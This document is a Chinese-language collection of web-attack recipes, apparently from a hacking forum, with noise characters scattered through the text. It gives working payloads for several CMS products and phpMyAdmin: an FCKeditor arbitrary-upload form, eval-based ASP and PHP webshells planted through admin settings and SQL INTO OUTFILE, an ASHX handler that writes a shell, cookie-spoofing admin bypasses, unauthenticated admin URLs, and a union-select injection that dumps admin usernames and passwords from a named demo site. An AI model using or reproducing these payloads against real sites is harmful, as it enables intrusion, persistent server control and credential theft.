/ W$ Z0 |1 } M. ?- L5 ~! R如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件
4 c" p/ Z$ l& q% s5 c8 G<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">: D) S$ e3 m" @+ X# H
Upload a new file:<br>; w' E- I/ L, [# A# l" `" J
<input type="file" name="NewFile" size="50"><br>
4 e. Y/ E" m9 x2 c6 k! m g<input id="btnUpload" type="submit" value="Upload">1 r* ]1 h0 i* v E0 Z0 J. u K
</form>& `- N0 a- D* F- Q/ E
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------7 L4 F- b, q8 t3 x
% i1 Z! |4 M% j4 K7 C0 k. v: o
SDcms 后台拿webshell
1 O! C$ z2 T; g6 s1 ?- p: P( z6 B+ @+ j; x
第一种方法:
8 @7 p( b2 ^9 d( z' @9 {进入后台-->系统管理-->系统设置-->系统设置->网站名称;1 }$ r1 a6 b# r' c" O5 X4 A
把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx* D1 \3 r, d% F6 M `
用菜刀链接http://www.xxx.com/inc/const.asp 就搞定了。
9 C3 \# G. ~$ M. i# _) }4 u3 C7 @第二种方法:4 g/ M ^, _: }3 v" s
进入后台-->系统管理-->系统设置-->系统设置->上传设置;! t1 X y+ _. H5 n: a6 g1 r7 p3 w
在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!" L8 z: Y9 R; d3 |: Q" ?
第三种方法:* W# f( ?7 ^- H7 s# d' X8 j
进入后台-->界面管理-->模板文件管理-->创建文件) N+ U; ~# X' v" f) C7 K
文件名写入getshell.ashx+ a+ Y2 v& z+ K& b! G
内容写入下面内容:
S9 R* a& e1 [& ~+ J4 L/====================复制下面的=========================/1 u- g4 g6 a, B' J9 G8 B
<%@ WebHandler Language="C#" Class="Handler" %>
q3 S+ L: x# b- Ausing System;- ]) n7 a. q5 Y& ^8 ^
using System.Web;! O1 ]9 G! i h, W
using System.IO;
. I W8 p2 E* A( B6 spublic class Handler : IHttpHandler {4 |' W' K# |! H) q; e
public void ProcessRequest (HttpContext context) {' A) u# Q0 O& Y% p: t* i
context.Response.ContentType = "text/plain";* V7 j& \& I3 L4 O. e
StreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));
- p; ~7 G+ U1 x/ ]# H: lfile1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");
- Y3 c9 c& A4 }2 sfile1.Flush();8 k6 u: D& E5 l5 c" r; T y
file1.Close();1 G7 o4 g- v% A/ o- L) V3 [
}
/ ?8 G. f* q% P1 {public bool IsReusable {
7 ?7 c, T! A6 |& P% J3 Eget {" [+ A7 R7 J9 f5 b* F
return false; m+ x1 f: R( V5 A! I
}. H, Q; j! Y5 ?; B9 ?
}
& J4 }, p0 Y9 v: O1 V: L+ p6 b}" y& r0 z% W+ f% L
/=============================================/0 c% A. ^5 } e% ~8 h! n) {
访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx
0 O) s% Z/ ^1 g) m8 ] p3 Q会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接
2 j `+ a! a) ^ u! r7 B' b-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
) H: @, `$ S8 P( C% V+ i$ M9 ]/ C
' I) K6 N/ n7 S" v; u }ESCMS网站管理系统0day3 F6 I2 d1 |! @7 C) Z
; J3 L2 |2 r& G! }( l: y
后台登陆验证是通过admin/check.asp实现的) n2 t% H# ^/ H' v, p. t
8 D6 C& V. [, ?1 P! X首先我们打开http://target.com/admin/es_index.html& `& p& e" P/ W, L
然后在COOKIE结尾加上 U, q& W) i" f0 @
; ESCMS$_SP2=ES_admin=st0p;# r9 V1 g9 d. A0 ]
修改,然后刷新
) @1 a# O- U/ j$ m% T9 @) q进后台了嘎..6 Z' ?* ]3 M8 U% Z2 D9 C
然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL9 k4 a- M1 d0 Z0 r
+ p( a; F! }6 [2 B D
利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.+ n& Z) o1 q! Z7 r. ^" }
嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp
3 I. ~6 Q( q* k$ k& x存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..
1 Y* e' X2 ]# N# B在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了
& g& u* |- {1 Q9 o$ K1 r------------------------------------------------------------------------------------------------------------------------------------------------------------------------------7 x) Z% r: D$ [2 X- w/ }3 [: F
" N. H1 w$ G8 L. T% A5 K- i8 |宁志网站管理系统后台无验证漏洞及修复
" l Z. E* V, p7 }% @! R0 X$ [) `9 G$ I4 o! k
网上搜了一下,好像没有发布.如有雷同纯粹巧合!7 j" i! ?4 S- s5 o9 J
官方网站:www.ningzhi.net
& w9 C+ t" y6 `% X1 \0 F学校网站管理系统 V.2011版本 # {5 L/ n8 E) f9 D B% L) d
http://down.chinaz.com/soft/29943.htm / }4 l3 T6 Y+ B
其它版本(如:政府版等),自行下载.
) S' a, t* s' I: H漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~
/ Z6 r! Q/ P0 Z3 z+ B# f4 y- Rlogin.asp代码如下:! F1 d& {6 f- ^, l: r
<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %>
# N6 q& U. p( }. ?manage.asp代码我就不帖出来了.反正也没验证.
8 G: M; S! e: b+ r2 ]6 `只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!5 B4 {+ R1 f% G+ _5 y
漏洞利用:. a2 M( o( J' \" K! E
直接访问http://www.0855.tv/admin/manage.asp
% H% u$ ^9 A3 | d, d0 I& Y数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web56 x( E+ c% `- ^$ }
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
2 q8 i2 z& ^/ Y) F: a: \; U3 O. L l' p+ [$ [: P: a4 ^& J; E7 K
phpmyadmin拿shell的四种方法总结及修复. S- ]. y. s* X1 J& l- Y
$ |- ~7 W, _) \8 E, E; z
方法一:) Y; `1 o7 I! |! x- J5 Q
CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
4 h, \4 z4 A! S) w" F& EINSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');
+ e, z9 g4 g1 W4 j3 s+ vSELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';' J( H3 L# ^, ?" B" U. |
----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php
% J; p: x# x# c$ I 一句话连接密码:7on4 d1 X+ Q; y d. r( D
方法二:( x+ N) O. S! ^6 D* @2 Y" T8 q
读取文件内容: select load_file('E:/xamp/www/s.php');* y ?8 _6 g8 c6 {' y2 n4 W, d0 L6 R
写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'& q( J! m& I" L& q0 c2 W7 f
cmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'% c$ f+ ^, H' T& x5 ]3 x( Z
方法三:
: d- \# l7 Z0 `7 `8 G! k. _JhackJ版本 PHPmyadmin拿shell& J7 M3 o& b4 Q2 `: ]
Create TABLE study (cmd text NOT NULL);
; x0 ^8 b4 c3 v8 A& f9 vInsert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');
4 q7 l7 q% w( A3 n) a$ z7 A5 ? |select cmd from study into outfile 'E:/wamp/www/7.php';3 {/ y6 B$ c9 F3 Y3 B# ]
Drop TABLE IF EXISTS study;! U1 J2 }2 q8 U( V6 e* u; l3 w1 e
<?php eval($_POST[cmd])?>( w; o# m/ Y5 Q6 v1 ^0 E4 u
CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。
/ L2 g* t! d/ F$ Z- RINSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1
1 o; P2 l8 _3 P {- |) a/ |' mSELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1% y1 w$ Q/ t8 s8 D+ q4 p! z1 r1 y
DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。+ V; E" E$ C% ?8 X
方法四:' ]6 w9 f% G$ I# q ^9 D9 C
select load_file('E:/xamp/www/study.php');! u2 ^# n7 T( W
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'5 b7 N1 d: r/ V+ {$ M) Z3 Q% `9 f
然后访问网站目录:http://www.2cto.com/study.php?cmd=dir. C p, Q, v# ?- \1 X' i
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
) N/ ?9 m- c! I
2 y1 Y# |" s- i- v! } X/ \& zNO.001中学网站管理系统 Build 110628 注入漏洞- p$ S( Q8 W5 l1 I8 c$ @2 \) B3 f
' W" X0 _2 m2 l) l( F$ O$ L, b; S
NO.001中学网站管理系统功能模块:& f5 K2 H# d8 s4 o+ _
1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等
- v) _# @3 W3 k' m o2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息
8 `1 m5 W7 H2 i5 P. e0 s( K3 G3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息
" f- d O; o1 J4 B/ u V8 _) `: @: w4.视频图片管理:一级分类,动态添加视频或者图片等信息
! _# c% v: Y7 {) E5.留言管理:对留言,修改,删除、回复等管理4 X; R: _$ T9 ?* O$ I; [2 |
6.校友频道:包括校友资料excel导出、管理等功能
, K; N# t. w d) L% P# w/ |6 Q! c5 t7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页2 k# T+ P+ h7 }, x. w# m) H
默认后台:admin/login.asp
- T' g8 z7 W3 H3 W3 r- D0 \官方演示:http://demo.001cms.net' p: t1 J2 k5 O6 c+ q5 r
源码下载地址:http://down.chinaz.com/soft/30187.htm
4 R' H" n! ?( o j+ w0 T+ f" Q& |EXP:7 I9 K3 p2 t0 M1 [* g
union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
- l5 e5 c; X( I; R. N6 q9 h测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin! B) D( y. N- x% r" U
getshell:后台有备份,你懂的, r8 {; p, C3 t2 [; K
另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。
5 x X+ ?. u! I+ F------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |